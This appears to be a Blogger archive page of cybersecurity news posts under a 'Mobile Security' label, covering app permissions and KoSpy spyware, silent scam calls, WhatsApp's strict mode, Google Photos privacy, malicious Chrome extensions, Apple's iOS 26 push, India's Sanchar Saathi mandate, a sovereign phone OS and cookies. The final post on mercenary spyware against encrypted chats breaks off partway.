Search This Blog

Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Showing posts with label Mobile Security. Show all posts

Security Specialists Warn That Full Photo Access Can Expose Personal Data


 

Mobile devices have become silent archives of modern life, storing everything from personal family moments to copies of identification documents and work files. However, their convenience has also made them a very attractive target for cyber-espionage activities. 

The Google Play Store was recently censored after investigators discovered several Android applications carried a sophisticated strain of spyware known as KoSpy. In a recent security intervention, Google removed several Android applications from the store. 

It is believed that the malicious software is capable of quietly infiltrating devices, harvesting sensitive information, and transmitting that information back to its operators without the users being aware. 

APT37 is believed to have been behind the campaign, and researchers believe the malware has been employed by the group since at least 2022 for covert surveillance activities. Privacy specialists have reaffirmed their warnings that something as common as granting applications broad permissions especially access to personal photo libraries can potentially lead to far more invasive forms of digital monitoring if done inadvertently. 

In addition, the incident emphasizes the importance of obtaining and using device permissions by mobile applications. In order for an Android or iOS application to function properly, it requires access to various components of the smartphone. 

In addition to install-time permissions, run-time permissions, and a few special permissions that are prompted during application usage, these requests typically fall into several categories. The majority of permissions are straightforward and are automatically granted during installation, while others require explicit approval by the user via prompts issued by the operating system.

Operating systems act as intermediaries between an application and the phone's hardware, determining whether an application can access sensitive resources such as the camera, microphone, storage, or location data. 

However, in spite of the fact that these controls have been designed to ensure that functional integrity is maintained across applications and that unauthorized interactions between software components are avoided, users often approve requests without fully considering the implications. 

When malicious or poorly secured applications abuse the runtime and special permissions those that provide deeper access to device data they pose the greatest security risks. Understanding why these permissions matter is central to evaluating the potential impact of spyware such as KoSpy App permissions essentially function as gatekeeping settings that determine what categories of personal data an application is allowed to collect, process, or transmit.

As a result of the need for this access, legitimate services can be provided. Messaging platforms, such as WhatsApp, for example, require camera and microphone permissions to provide voice and video calls, while navigation tools, such as Google Maps, utilize location data to provide real-time directions and localized information. 

When these permissions are granted to untrusted software, however, they may also serve as vectors for exploitation. When location access is misused, it could lead to the recording of covert audio or the unauthorized monitoring of conversations, thereby exposing users to surveillance risks or even physical safety concerns.

Microphone permissions, if misused, could enable covert audio recording. Social networking platforms, such as Facebook and Instagram, commonly request access to contact lists. By leveraging this data, applications can map social connections as well as run aggressive marketing campaigns, distribute spam, or harvest information. 

The storage permissions necessary to allow apps to read and upload files, such as those required by photo editing and document management software, can also pose a serious privacy concern if granted to applications without a clear functional reason for accessing personal documents. 

Security analysts report that the cumulative effect of these permissions can be significant, especially when malicious software has been specifically designed to take advantage of them to collect covert data. 

Privacy advocates have expressed concerns about mobile permissions in connection with a wide variety of products and services, not just obscure applications and alleged spyware campaigns. As well as some of the world's largest technology platforms have faced scrutiny from the privacy community over how their data is handled once access has been granted.

In a series of cases cited by digital rights groups, Meta Platforms, the parent company of Facebook, has demonstrated how extensive data access can lead to complex privacy implications. A criminal investigation involving a mother and daughter accused of carrying out an abortion in 2022 drew widespread criticism after the company provided law enforcement authorities with private message records connected to that investigation. 

It has been argued that this case illustrates how copies of personal information stored on major platforms can be accessed by legal processes, thus raising broader questions about how digital information is preserved, analyzed, and ultimately disclosed.

The Surveillance Technology Oversight Project's communications director, Will Owen, believes that such cases demonstrate the ability of technology platforms to facilitate government access to sensitive personal information in certain circumstances, where it is legally required. 

Concerns were recently raised when a Facebook feature requested users to provide the platform with access to their device's camera roll in order for the platform to automatically suggest photos using artificial intelligence on their device. Users were invited to enable cloud-based processing that analyzed images stored on their devices in order to generate variants enhanced by artificial intelligence. 

Activating such a feature could result in the platform's systems processing photographs and potentially analyzing biometric data such as facial features, according to privacy advocates. Despite the tool being presented as a convenience feature designed to enhance photo sharing, some users expressed concerns regarding its scope of data processing.

There appears to be a lack of widespread availability of this feature, and the company has not publicly clarified its current status. Security experts emphasize the importance of digital hygiene by citing these examples. However, even when a feature is presented as an optional enhancement, users should carefully consider what information an application may have access to. 

Facebook, for example, allows users to review and modify camera roll integration settings within their privacy controls in the "Settings and Privacy" menu, which contains options for managing photo suggestions and sharing of images. Despite the appearance that these adjustments are merely minor, limiting broad access to a user's personal photo libraries remains an effective safeguard for smartphone users. 

A privacy expert notes that restricting such permissions not only reduces the probability of accidental data exposure, but also ensures that personal images are not processed, stored, or shared in ways they were not intended. In addition to the increasing sophistication of smartphones, persistent concerns have been raised regarding how extensive user activity could be monitored by mobile devices.

Whenever multiple applications run simultaneously-many of which have microphone access, voice recognition capabilities, and integration with digital assistants-questions arise regarding whether smartphones passively listen to conversations in order to send targeted advertising or notifications. 

 Despite the fact that modern mobile operating systems include safeguards to protect against unauthorized recording, the discussion points to a broader issue surrounding data governance on personal devices. A user's choice of whether to approve permission requests is determined by both the developer's design and the choices made by the user. 

There are many organizations that develop mobile applications, including large technology companies, independent developers, internal engineering teams, and outsourced development firms. However, the last layer of control remains with the end user, even though most development processes adhere to established security practices, privacy policies, and compliance frameworks. 

The possibility of an attack surface being increased by granting permissions indiscriminately can lead to an increase in device vulnerabilities, particularly in the case of applications requesting access to resources not directly required for their core functionality. Therefore, security specialists emphasize that app installation and permission management should be managed more deliberately.

By assessing application ratings, assessing developer credibility, and examining permission requests prior to installation, malicious or poorly designed software can be significantly reduced. It is imperative that users periodically review the permission management settings available within both Android and iOS to ensure that they are aware of which applications retain access to sensitive information such as microphones, storage space, and location services to ensure that access is granted only when the information clearly supports an application's legitimate function. 

Keeping operating systems and applications up-to-date also helps mitigate potential security vulnerabilities that may occur over time. As mobile ecosystems continue to evolve toward increasingly data-driven digital services, developers are expected to adopt more transparency regarding the collection and processing of personal information.

Despite this, cybersecurity professionals consistently emphasize that user behavior is essential to data protection. The use of personal devices as storage devices for large volumes of sensitive information has been demonstrated to be very effective in maintaining control over digital footprints. 

Exercise caution with permissions, installing applications only from trusted marketplaces, and regularly auditing privacy settings remain among the most effective methods for maintaining control. It is important to note that mobile security is no longer limited to antivirus tools or system updates alone. 

Since smartphones continue to provide access to personal, financial, and professional information, managing application permissions is becoming increasingly important to everyday cybersecurity practices. 

A number of analysts suggest that users should evaluate new apps carefully before downloading them evaluating whether the permissions they are asked for align with the service they are attempting to access, and reconsidering requests for access that seem excessive or unnecessary. 

Practice suggests tightening permission controls, reviewing privacy settings frequently, and utilizing well-established applications developed by trusted developers in order to reduce the likelihood of covert data collection.

Despite the fact that platforms and developers share responsibility for strengthening protections, experts emphasize that informed and cautious user behavior is still the most effective means of protecting against emerging threats to mobile surveillance.

Silent Scam Calls Used to Verify Active Phone Numbers, Cybersecurity Experts Warn

 

Many people have answered calls from unfamiliar numbers only to hear silence on the other end. In some cases, no one speaks at all. In others, there is a short delay before a caller finally responds. While this may appear to be a simple mistake or a wrong number, cybersecurity experts say these calls are often part of a deliberate scam tactic used to verify active phone numbers. 

According to security specialists, these silent calls function as a form of automated reconnaissance. Fraud operations run large-scale calling systems that dial thousands of numbers to determine which ones belong to real people. When someone answers, the system confirms that the number is active and marks it as a potential target for future scams. 

Keeper Security Chief Information Security Officer Shane Barney explained that such calls are rarely accidental. Instead, they help attackers filter out inactive numbers before investing more time and resources into scams. Verified contact information has value in modern cybercrime networks, where data about reachable individuals can be bought, sold, and reused across different fraud campaigns. 

Once a phone number is confirmed as active, it may be used in several ways. In some cases, scammers follow up with phishing calls or messages designed to trick victims into revealing personal or financial information. In more advanced attacks, a verified phone number could be combined with leaked email addresses from data breaches or used in schemes such as SIM-swap fraud, where attackers attempt to gain control of a victim’s mobile account. 

Another variation occurs when callers respond only after a brief pause. This delay is typically caused by predictive dialing systems that automatically place large volumes of calls. These systems detect when a human answers and then route the call to a live operator. The short silence represents the time it takes for the system to transfer the connection. 

Some people also worry that speaking during these calls could allow scammers to clone their voice using artificial intelligence. While voice cloning technology exists, experts say creating a convincing replica generally requires longer and clearer audio samples than a brief greeting. 

However, voice cloning could still become part of larger scams if criminals already possess other personal details about a victim. Security professionals recommend simple precautions when receiving suspicious calls. If an unknown number produces silence, hanging up immediately is usually the safest option. 

Another tactic is answering without speaking, which prevents automated systems from detecting a human voice. Spam-filtering tools can also help reduce nuisance calls. Applications such as Truecaller, RoboKiller, and Hiya identify numbers previously reported as spam. However, experts caution that no filtering system is perfect because scammers frequently change phone numbers. 

Ultimately, while call-blocking tools can reduce the volume of unwanted calls, maintaining strong account security and being cautious with unknown callers remain the most effective ways to avoid phone-based scams.

WhatsApp Launches High-Security Mode for Ultimate User Protection

 

WhatsApp has launched a new high-security mode called "Strict Account Settings," providing users with enhanced defenses against sophisticated cyber threats. This feature, introduced on January 27, 2026, allows one-click activation and builds on the platform's existing end-to-end encryption. It targets high-risk individuals like journalists and public figures facing advanced attacks, marking WhatsApp as the third major tech firm to offer such protections after Apple's Lockdown Mode and Google's Advanced Protection.

The mode activates multiple safeguards simultaneously through a simple toggle in WhatsApp settings under Privacy > Advanced. It blocks media files and attachments from unknown senders, preventing potential malware delivery via images or documents. Link previews—thumbnails that appear for shared URLs—are disabled to eliminate risks from embedded tracking or exploits, while calls from unknown numbers are automatically silenced, appearing only in missed calls.

These measures address common attack vectors identified in cyber surveillance campaigns. For instance, malicious attachments and link previews have been exploited in spyware incidents targeting activists and reporters. By muting unknown calls, the feature reduces social engineering attempts like vishing scams, where attackers impersonate contacts to extract information. WhatsApp's blog emphasizes that while everyday users benefit from standard encryption, this mode offers "extreme safeguards" for rare, high-sophistication threats.

Similar to competitors' offerings, robust account settings trades convenience for security, limiting app functionality for greater protection. Apple's Lockdown Mode, available since 2022, restricts attachments and browser features, while Google's Android version blocks risky app downloads. Cybersecurity experts have welcomed WhatsApp's step, calling it a "very welcome development" for civil society defenders. The rollout is global on iOS and Android, with full availability expected in coming weeks.

As cyber threats evolve with AI-driven attacks and state-sponsored hacking, features like this empower users to customize defenses. High-risk professionals can now layer protections without switching apps, fostering safer digital communication. However, Meta advises reviewing settings post-activation, as it may block legitimate interactions from new contacts. This move aligns with rising demands for privacy amid global data scandals.

Google Issues Urgent Privacy Warning for 1.5 Billion Photos Users

 

Google has issued a critical privacy alert for its 1.5 billion Google Photos users following accusations of using personal images to train AI models without consent. The controversy erupted from privacy-focused rival Proton, which speculated that Google's advanced Nano Banana AI tool scans user libraries for data. Google has quickly denied the claims, emphasizing robust safeguards for user content. 

Fears have mounted as Google rapidly expands artificial intelligence in Photos to include features such as Nano Banana, which turns any image into an animation. Using the feature is fun, but critics note that it processes photos via cloud servers, which raises concerns about data retention and possible misuse. Incidents like last year's Google Takeout bug, which made other people's videos appear in the exports of those downloading their data, have fed skepticism about the security of the platform.

Google explained that, unless users explicitly share photos and videos, the company does not use personal photos or videos to train generative AI models like Gemini. It also acknowledged that Photos does not have end-to-end encryption but instead conducts automated scans for child exploitation material and professional reviews. This transparency aims at rebuilding trust as viral social media trends amplify Nano Banana's popularity. 

According to security experts, users are seeing wider impacts as the AI integration expands across Google services, echoing recent Gmail data training refusals. Proton and experts advise caution, suggesting users check their privacy dashboards and limit what they upload to the cloud. With billions of images on the line, this cautionary tale highlights the push and pull between innovation and data privacy in cloud storage.

To mitigate risks, enable two factor authentication, use local backups, or consider encrypted options like Proton Drive. While Google is still patching vulnerabilities, users should still be vigilant as threats continue to evolve and become more AI-driven. In the face of increasing scrutiny, this incident serves as a stark reminder of the necessity for clearer guidelines in an age of ubiquitous AI-powered photo processing.

Phantom Shuttle Chrome Extensions Caught Stealing Credentials

 

Two malicious Chrome extensions named Phantom Shuttle have been discovered to have acted as proxies and network test tools while stealing internet browsing and private information from people’s browsers without their knowledge.

According to security researchers from Socket, these extensions have been around since at least 2017 and were present in the Chrome Web Store until the time of writing. This raises serious concerns regarding the dangers associated with browser extensions even from reputable sources. 

Analysis carried out by Socket indicates that the Phantom Shuttle extension directs the online traffic of the victims to a proxy setup that is controlled by the attackers using hardcoded credentials. The attackers hid the malcode using the approach of prepending the malcode to a jQuery library. 

The hardcoded credentials for the proxy are also obfuscated using a custom character index-based encoding scheme, which could impact detection and reverse engineering efficiency. The built-in traffic listener in the extensions is capable of intercepting HTTP authentication challenges on multiple websites.

Modus operandi 

To force traffic through its infrastructure, Phantom Shuttle dynamically modifies Chrome’s proxy configuration using an auto-configuration script. In a default mode labeled “smarty,” the extensions allegedly route more than 170 “high-value” domains through the proxy network, including developer platforms, cloud consoles, social media services, and adult sites. Additionally, to avoid breaking environments that could expose the operation, the extensions maintain an exclusion list that includes local network addresses and the command-and-control domain. 

Since the extensions operate a man-in-the-middle, they can seize data passed through forms such as credentials, payment card data, passwords and other personal information. Socket claims the extensions can also steal session cookies from HTTP headers, and parse API tokens from requests, potentially taking over accounts even if passwords aren't directly harvested. 

Mitigation tips 

Chrome users are warned to download extensions only from trusted developers, to verify multiple user reviews and to be attentive to the permissions asked for when installing. In sensitive workload environments (cloud admin, developer portals, finance tools), minimizing extensions and removing those not in use can also dramatically reduce exposure to similar proxy-based credential heists.

Apple Forces iOS 26 Upgrade Amid Active iPhone Security Threats

 

Apple has taken an unusually firm stance on software updates by effectively forcing many iPhone users to move to iOS 26, citing active security threats targeting devices in the wild. The decision marks a departure from Apple’s typical approach of offering extended security updates for older operating system versions, even after a major new release becomes available.

Until recently, it was widely expected that iOS 18.7.3 would serve as a final optional update for users unwilling or unable to upgrade to iOS 26, particularly those with newer devices such as the iPhone 11 and above. Early beta releases appeared to support this assumption, with fixes initially flagged for a broad range of devices. That position has since changed. 

Apple has now restricted key security fixes to older models, including the iPhone XS, XS Max, and XR, leaving newer devices with no option other than upgrading to iOS 26 to remain protected. Apple has confirmed that the vulnerabilities addressed in the latest updates are actively being exploited. The company has acknowledged the presence of mercenary spyware operating in the wild, targeting specific individuals but carrying the potential to spread more widely over time. These threats elevate the importance of timely updates, particularly as spyware campaigns increasingly focus on mobile platforms. 

The move has surprised industry observers, as iOS 18.7.3 was reportedly compatible with newer hardware and could have been released more broadly. Making the update available would likely have accelerated patch adoption across Apple’s ecosystem. Instead, Apple has chosen to draw a firm line, prioritizing rapid migration to iOS 26 over backward compatibility.

Resistance to upgrading remains significant. Analysts estimate that at least half of eligible users have not yet moved to iOS 26, citing factors such as storage limitations, unfamiliar design changes, and general update fatigue. While only a small percentage of users are believed to be running devices incompatible with iOS 26, a far larger group remains on older versions by choice. This creates a sizable population potentially exposed to known threats. 

Security firms continue to warn about the risks of delayed updates. Zimperium has reported that more than half of mobile devices globally run outdated operating systems at any given time, a condition that attackers routinely exploit. In response, U.S. authorities have also issued update warnings, reinforcing the urgency of Apple’s message. 

Beyond vulnerability fixes, iOS 26 introduces additional security enhancements. These include improved protections in Safari against advanced tracking techniques, safeguards against malicious wired connections similar to those highlighted by transportation security agencies, and new anti-scam features integrated into calls and messages. Collectively, these changes reflect Apple’s broader push to harden iPhones against evolving threat vectors. 

With iOS 26.3 expected in the coming weeks, users who upgrade now are effectively committing to Apple’s new update cadence, which emphasizes continuous feature and security changes rather than isolated patches. Apple has also expanded its ability to deploy background security updates without user interaction, although it remains unclear when this capability will be used at scale. 

Apple’s decision underscores a clear message: remaining on older software versions is no longer considered a safe or supported option. As active exploitation continues, the company appears willing to trade user convenience for faster, more comprehensive security coverage across its device ecosystem.

India’s Spyware Policy Could Reshape Tech Governance Norms


 

Several months ago, India's digital governance landscape was jolted by an unusual experiment in the control of state-controlled devices, one that briefly shifted the conversation from telecommunication networks to the mobile phones carried in consumers' pockets during the conversation. 

It has been instructed that all mobile handsets intended for the Indian market be shipped with a pre-installed government-developed security application called Sanchar Saathi, which is a technology shield against the use of cell phones. This was an initiative that is being positioned by the Indian Government as a technological protection against cell phone crimes. 

According to the app's promotional materials, Communication Partner (which translates to Communication Partner) was created to help users, particularly those in the mobile sector, counter mobile phone theft, financial fraud, spam, and other mobile-led scams that, as a result, have outpaced traditional police efforts. 

Further, the Department of Telecommunications (DoT), the regulatory authority responsible for overseeing the mandate, stated that the application’s core functionalities could neither be disabled nor restricted by end users, effectively making the application a permanent component of the operating environment, effectively classifying it as such. 

A 120-day deadline had been set for device makers to submit a detailed compliance report, including a system-level integration assessment, an audit confirmation and a detailed compliance report. It is important to note, however, that the order, which was originally defended on the basis of cybersecurity, quickly encountered a wave of public and political opposition. 

Leaders of opposition, privacy advocates, and digital-rights organizations questioned the proportionality of this measure as well as the inherent risks associated with compulsory, non-removable state applications on personal devices, as well as stating that such software could be used to collect mass data, track real-time locations, and continuously profile people's behavior.

It did not take long for the Department of Transportation to retract the mandatory installation requirement after a short period of time, stating that users had already accepted the application and that mandatory pre-installation was not required. Despite the swift withdrawal, the policy failed to quell wider unrest, amplifying fears that the policy reflected a deeper intention to normalize state access to private hardware with the rhetorical background of crime prevention, rather than quell it. 

Many commentators pointed out the uneasy similarities between this situation and the surveillance state described in George Orwell's 1984, where oversight is not only a default state of affairs but a matter of course. Several commentators feared that the episode was a sign that an eventual future where the individual might lose control over their personal technology to government-defined security priorities could be envisioned. 

Many experts, however, believe that the controversy involves not just a single application, but rather a precedent that the application tries to set-one that raises fundamental questions about the role of technology in society, whether this is a legitimate right, and the limits of privacy of citizens in the largest democracy in the world. 

Additionally, the mandate extends beyond new inventory, in that already in circulation handsets must be updated to accommodate the government application through software updates. As a result of the accompanying provisions, it is explicit that users and manufacturers cannot disable, limit, or obstruct its core functionalities. 

The directive, which was conceived as a measure to strengthen cyber intelligence and combat cyber fraud, has sparked a widening discussion among security researchers, civil-rights activists, and technology policy experts over the past few months. 

It has been reported that some security researchers, civil-rights advocates, and technology policy experts are warning that such state applications, which are compulsory and non-removable, will markedly alter India's approach to digital governance in a profound way, blurring longstanding boundaries between security objectives and individual control over private technology. 

After abruptly reversing its policy on Wednesday, the Indian government withdrew the directive that had instructed global smartphones manufacturers such as Apple and Samsung to embed a state-developed security application into all mobile handsets sold in the country. 

Several opposition lawmakers and digital-rights organizations, including those from the opposition party, reacted violently to the decision following a two-day backlash in which it was claimed that the Sanchar Saathi application, which means "Communication Partner" in Hindi, was not intended for security purposes but rather for surveillance purposes by the state.

In response to the mandate, critics from across the political aisle and privacy advocacy groups had publicly attacked the directive as an excessive intrusion into personal devices, claiming that the government was planning to "snoop on citizens through their phones." 

In response to mounting criticism, the Ministry of Communications issued a statement Wednesday afternoon confirming that the government had decided not to impose mandatory pre-installation, clarifying that manufacturers would no longer be bound by the order. As it was first circulated confidentially to device makers late last month, the original directive came into public discussion only after it was leaked to domestic media on Monday. 

According to the order, new handsets were required to comply with the requirement within 90 days of its release, and previously sold devices were also required to comply via software updates. This order was explicitly stating that key functions of the app cannot be disabled or restricted in order for them to be compliant with the rules. 

Despite the fact that the ministry had positioned the policy in a way that was supposed to protect the nation's digital security, its quiet withdrawal signifies a rare moment in which external scrutiny reshaped the state's digital policy calculus, emphasizing the importance of controlling personal technology, especially in the world's second largest mobile market. 

When the directive was first circulated to industry stakeholders, it was positioned to provide a narrow compliance window for new devices, but set a much more stringent requirement for handsets already in use. For manufacturers to ensure that all new units, whether they were manufactured in the factory or imported into India, carried the Sanchar Saathi application by default, they were given 90 days to do so. 

When the unsold devices had already been positioned in retail and distribution pipelines, companies were instructed to deliver the software retroactively through system updates to ensure that the devices were present throughout the supply chain, ensuring that they were present across supply chains. The policy, if it had been enforced, would have standardized the tool throughout one of the world’s largest mobile markets. 

Over 735 million people use smartphones every day. Government officials defended the mandate as a consumer protection imperative, arguing that it was necessary to protect consumers from telecom fraud based on duplicate or cloned IMEI numbers - 14 to 17 digit identification codes for mobile phones - which are the primary authentication codes on mobile networks. 

With the Sanchar Saathi platform, linked to a centralized registry, users can report missing smartphones, block stolen devices, block suspicious network access, and flag fraudulent mobile communications that have been sent. 

There was also evidence that it was necessary to launch the app in the first place: according to government data, since the app was launched in January, it has been able to block more than 3.7 million lost or stolen phones, and over 30 million illicit mobile connections have been terminated, including scams involving telecom companies and identity frauds associated with the app. 

Despite this, the mandate put India at odds with Apple, a company whose history is characterized by a reluctance to preload government and third party applications on its products, citing ecosystem integrity and operating system security as key concerns. 

In spite of Apple's relatively small share of the India smartphone market share of 4.5%, it holds a disproportionate amount of weight in global discussions about secure device architectures. Several industry insiders have noted that Apple's internal policies prohibit the inclusion of external software before the retail sale of the product, making regulatory friction a probable outcome. 

It was believed in the beginning that New Delhi would eventually sway Apple's pre-installation requirement, replacing it with optional installation prompts or software nudges which could be delivered at the operating system level, replacing mandatory pre-installation. A security researcher who spoke on condition of anonymity argued that negotiations could lead to a midpoint. 

Rather than imposing a mandate, they might settle for a nudge, the researcher said, echoing broader industry assumptions that the policy would prove to be more malleable in practice than it initially appeared. Privacy advocates, however, felt that the short lifespan of the order did not diminish its significance despite the fact that its duration was relatively short. 

Organizations that represent civil society have warned that non-removable, mandatory state applications - even when they present themselves as essential tools to combat fraud - may affect the normalization of a level of technical authority over individual devices that extends well beyond the prevention of telecom crimes. 

A quick comparison was drawn between Russia's recent requirement that a state-backed message application be embedded into smartphones and similar software standardization efforts in Russia and Russia-aligned regulatory environments, among other examples. According to Mishi Choudhary, a lawyer specializing in technology rights, "The government removes user consent as a meaningful choice, encapsulating the core argument from digital rights groups," he said.

Prior to the order being leaked to Indian media, the Ministry of Communications, which issued it on a confidential basis, declined to publicly release the entire directive or make any substantive comments regarding privacy issues. Critics contend that this silence compounded fears by leaving behind an impression of regulatory overreach that was not tempered by clarified safeguards, but by political optics. 

The episode of the cybercrime crisis continued to evoke questions about the transparency in cybersecurity policymaking, the future of digital consent, and the precedent that would be set when state security frameworks began to reach into the software layer of personal hardware in a democracy already struggling with rapid digitization and fragile public trust, even after the government announced it would not enforce pre-installation requirements anymore. 

A number of technology policy analysts also issued important warnings about the mandate, arguing that the risks lay not just in the stated purpose of the application but in the level of access it may be able to command in the future. 

Prasanto K. Roy, a specialist in India's digital infrastructure, who maintains a long-term study of the country's regulatory impulses, characterized the directive as an example of a larger problem: the lack of transparency about what state-mandated software might ultimately be allowed to do on the hardware of individual users. 

During an interview, Roy commented on the report that while Sanchar Saathi's internal workings are still unclear to the public, the permissions it seeks indicate that it is worth exercising caution. Despite the fact that we are not sure exactly what it is doing, we can see that it is asking for a lot of permissions from the flashlight to the camera which suggests that it has the potential to access almost everything. 

“That alone is problematic,” he added, reflecting a growing consensus among cybersecurity researchers that expansive access requests carry structural risks when they are connected to applications that aren’t subject to independent audits or external oversight, even when explained as security prerequisites. 

According to the Google Play Store's declaration, the application does not collect nor share user data, a statement which the government cited in its initial defense of the policy. The government, however, has limited its public communication around the order itself, which has exacerbated questions about consent and scope. 

A BBC spokesperson confirmed that the company has formally contacted the Department of Telecommunications seeking clarification on both the privacy posture of the application as well as what safeguards if any might apply to future updates and changes to the backend capabilities of the application. 

Roy, in addition, highlighted the fact that the requirements for compliance tend to conflict directly with long-standing policies maintained by most global handset manufacturers, particularly Apple, which in the past has resisted embedding government or third-party applications at the point of sale, and isn't likely to do so in the future either. 

The vast majority of handset manufacturers prohibit the installation of any government app or any external app before a handset is sold - except for the Chinese and Russian companies, Roy stated, adding that the Indian order effectively forbade manufacturers from deviating from long-established operating norms. 

Even though Android is the most prevalent smartphone in India, Apple's market share has become a crucial part of the policy's geopolitical undertones estimated at 4.5 percent by mid-2025 which has been attributed to the policy's geopolitical undertones. Apple has not yet issued a public statement about compliance, but it has been reported that they plan not to. 

Apple is planning to communicate its concerns with Delhi, according to sources cited by Reuters, while a Reuters report said the company would register its objections with the Indian government in writing. Apple was reported to not intend to comply with India's directive, and was planning on raising its concerns with the Indian government, as suggested in another Reuters report. 

Even though the comparison did little to soften its reception, the Indian directive is not completely without international precedent. According to a report published by the Russian media in August 2025, all Russian mobile phones and tablets sold domestically must carry the MAX messenger application endorsed by the government, sparking a similar debate around surveillance risks and digital autonomy. 

In this episode, India was placed along with a small but notable group of nations that have tightened device verification rules through a software-based approach to enforcement, rather than relying on telecom operators or network intermediaries for oversight. That parallel underscored the concerns of privacy advocates rather than eased them. 

This reinforced the belief that cybersecurity policies that rely on mandatory software, broad permissions, and silent updates - without transparent guardrails risk recalibrating the balance between fraud prevention and digital sovereignty for individuals.

Indian spyware mandate's brief rise and fall will probably outlast the order itself, leaving a policy inflection point that legislators, courts, and technology companies cannot ignore for the foreseeable future. This episode illustrates one of the most important aspects of modern security the debate shifts from intention to capability once software is a regulation instrument, instead of reassurance to verification once it becomes a regulatory instrument. 

The government globally faces legitimate pressure to curb digital fraud, secure device identities, and defend the telecom infrastructure. However, experts claim that trust isn't strengthened by force but by transparency, technical auditability, and clearly defined mandates anchored in law rather than ambiguity that strengthen trust.

For India, the controversy presents an opportunity not to retreat but instead to recalibrate. According to analysts, cybersecurity frameworks governing consumer devices should also contain public rule disclosures, third-party security assessments, granular consent architectures, sunset clauses for software updates from the state, and granular consent architectures. 

The groups who are representing the rights of digital citizens have also urged that future antifraud tools be activated with opt-ins, data minimization standards, local processing on devices, and not silent updates to the server without notification to the user.

However, the Sanchar Saathi debate has raised larger questions for democracies that are navigating mass digitization in the future who owns the software layer on personal hardware and how far can security imperatives extend before autonomy contracts are imposed? 

There is a growing consensus that the next decade of India's digital social contract will be defined by the answers, which will determine how innovation, security, and privacy coexist not just through negotiation, but through design as well.

Swiss Startup Soverli Introduces a Sovereign OS Layer to Secure Smartphones Beyond Android and iOS

 

A Swiss cybersecurity startup, Soverli, has introduced a new approach to mobile security that challenges how smartphones are traditionally protected. Instead of relying solely on Android or iOS, the company has developed a fully auditable sovereign operating system layer that can run independently alongside existing mobile platforms. The goal is to ensure that critical workflows remain functional even if the underlying operating system is compromised, without forcing users to abandon the convenience of modern smartphones. 

Soverli’s architecture allows multiple operating systems to operate simultaneously on a single device, creating a hardened environment that is logically isolated from Android or iOS. This design enables organizations to maintain operational continuity during cyber incidents, misconfigurations, or targeted attacks affecting the primary mobile OS. By separating critical applications into an independent software stack, the platform reduces reliance on the security posture of consumer operating systems alone. 

Early adoption of the technology is focused on mission-critical use cases, particularly within the public sector. Emergency services, law enforcement agencies, and firefighting units are among the first groups testing the platform, where uninterrupted communication and system availability are essential. By isolating essential workflows from the main operating system, these users can continue operating even if Android experiences failures or security breaches. The same isolation model is also relevant for journalists and human rights workers, who face elevated surveillance risks and require secure communication channels that remain protected under hostile conditions.  

According to Soverli’s leadership, the platform represents a shift in how mobile security is approached. Rather than assuming that the primary operating system will always remain secure, the company’s model is built around resilience and continuity. The sovereign layer is designed to stay operational even when Android is compromised, while still allowing users to retain the familiar smartphone experience they expect. Beyond government and critical infrastructure use cases, the platform is gaining attention from enterprises exploring secure bring-your-own-device programs. 

The technology allows employees to maintain a personal smartphone environment alongside a tightly controlled business workspace. This separation helps protect sensitive corporate data without intruding on personal privacy or limiting device functionality. The system integrates with mobile device management tools and incorporates auditable verification mechanisms to strengthen identity protection and compliance. The underlying technology was developed over four years at ETH Zurich and does not require specialized hardware modifications. 

Engineers designed the system to minimize the attack surface for sensitive applications while encrypting data within the isolated operating system. Users can switch between Android and the sovereign environment in milliseconds, balancing usability with enhanced security. Demonstrations have shown secure messaging applications operating inside the sovereign layer, remaining confidential even if the main OS is compromised. Soverli’s approach aligns with Europe’s broader push toward digital sovereignty, particularly in areas where governments and enterprises demand auditable and trustworthy infrastructure. 

Smartphones, often considered a weak link in enterprise security, are increasingly being re-evaluated as platforms capable of supporting sovereign-grade protection without sacrificing usability. Backed by $2.6 million in pre-seed funding, the company plans to expand its engineering team, deepen partnerships with device manufacturers, and scale integrations with enterprise productivity tools. Investors believe the technology could redefine mobile security expectations, positioning smartphones as resilient platforms capable of operating securely even in the face of OS-level compromise.

Cookies Explained: Accept or Reject for Online Privacy

 

Online cookies sit at the centre of a trade-off between convenience and privacy, and those “accept all” or “reject all” pop-ups are how websites ask for your permission to track and personalise your experience.Understanding what each option means helps you decide how much data you are comfortable sharing.

Role of cookies 

Cookies are small files that websites store on your device to remember information about you and your activity. They can keep you logged in, remember your preferred settings, or help online shops track items in your cart. 
  • Session cookies are temporary and disappear when you close the browser or after inactivity, supporting things like active shopping carts. 
  • Persistent cookies remain for days to years, recognising you when you return and saving details like login credentials. 
  • Advertisers use cookies to track browsing behaviour and deliver targeted ads based on your profile.
Essential vs non-essential cookies

Most banners state that a site uses essential cookies that are required for core functions such as logging in or processing payments. These cannot usually be disabled because the site would break without them. 

Non-essential cookies generally fall into three groups:
  • Functional cookies personalise your experience, for example by remembering language or region.
  • Analytics cookies collect statistics on how visitors use the site, helping owners improve performance and content.
  • Advertising cookies, often from third parties, build cross-site, cross-device profiles to serve personalised ads.

Accept all or reject all?

Choosing accept all gives consent for the site and third parties to use every category of cookie and tracker. This enables full functionality and personalised features, including tailored advertising driven by your behaviour profile. 

Selecting reject all (or ignoring the banner) typically blocks every cookie except those essential for the site to work. You still access core services, but may lose personalisation and see fewer or less relevant embedded third-party elements.Your decision is stored in a consent cookie and many sites will ask you again after six to twelve months.

Privacy, GDPR and control

Under the EU’s GDPR, cookies that identify users count as personal data, so sites must request consent, explain what is being tracked, document that consent and make it easy to refuse or withdraw it. Many websites outside the EU follow similar rules because they handle European traffic.

To reduce consent fatigue, a specification called Global Privacy Control lets browsers send a built-in privacy signal instead of forcing users to click through banners on every site, though adoption remains limited and voluntary. If you regret earlier choices, you can clear cookies in your browser settings, which resets consent but also signs you out of most services.

Encrypted Chats Under Siege: Cyber-Mercenaries Target High-Profile Users

 

Encrypted Chats Under Siege Encrypted communication, once considered the final refuge for those seeking private dialogue, now faces a wave of targeted espionage campaigns that strike not at the encryption itself but at the fragile devices that carry it. Throughout this year, intelligence analysts and cybersecurity researchers have observed a striking escalation in operations using commercial spyware, deceptive app clones, and zero-interaction exploits to infiltrate platforms such as Signal and WhatsApp.
 
What is emerging is not a story of broken cryptographic protocols, but of adversaries who have learned to manipulate the ecosystem surrounding secure messaging, turning the endpoints themselves into compromised windows through which confidential conversations can be quietly observed.
  
The unfolding threat does not resemble the mass surveillance operations of previous decades. Instead, adversarial groups, ranging from state-aligned operators to profit-driven cyber-mercenaries, are launching surgical attacks against individuals whose communications carry strategic value.
 
